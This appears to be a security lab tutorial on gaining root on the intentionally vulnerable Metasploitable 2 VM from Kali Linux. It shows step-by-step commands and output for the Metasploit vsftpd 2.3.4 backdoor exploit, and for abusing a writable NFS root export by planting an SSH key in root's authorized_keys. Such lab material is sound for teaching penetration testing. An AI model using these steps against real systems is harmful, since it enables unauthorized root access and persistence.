Metasploitable2: Hack FTP Server and NFS Server using Kali Linux

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.

In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.  

In the scan found the following vulnerability in 'vsftpd'.

vsftpd Compromised Source Packages Backdoor Vulnerability

In this tutorial, we will exploit this vulnerability using Metasploit and get 'root' access on the machine.

1) Start Metasploit.
root@kali:~# msfconsole


2) Search for the vsftpd vulnerability
msf > search vsftpd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


3) Use the vulnerability
msf > use exploit/unix/ftp/vsftpd_234_backdoor


4) Set the IP address of the 'victim' machine
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
RHOST => 192.168.122.73


5) Exploit the vulnerability and get root access.
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.122.115:42588 -> 192.168.122.73:6200) at 2015-05-27 14:29:55 +0530

id
uid=0(root) gid=0(root)


After an attacker has gained 'root' access, he will typically install a rootkit, so that he can come and go at will and hide his activities from the administrator. The rootkit will attempt to remove all traces of an attacker's presence from the log files. And replace binaries such as ls, ps, ifconfig, killall, netstat, lsof, passwd. In a future tutorial, we will see how to use 'tripwire' and 'chkrootkit' to detect rootkits.

Attack NFS and get root login

During the Vulnerability Scan of the 'Metasploitable 2' virtual machine in a previous post, we found the following misconfiguration in NFS Server.

The Root File System is exported in read/write mode.

root@kali:~# showmount -e 192.168.122.73

Export list for 192.168.122.73:/ *


Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:


root@kali:~# mount -o nolock 192.168.122.73:/ /mnt


root@kali:~# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):  
Enter same passphrase again:  
Your identification has been saved in /root/.ssh/id_rsa. 
Your public key has been saved in /root/.ssh/id_rsa.pub.


root@kali:~# cat .ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys


root@kali:~# umount /mnt


root@kali:~# ssh 192.168.122.73
Last login: Mon May 25 07:46:57 2015 from :0.0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 
root@metasploitable:~#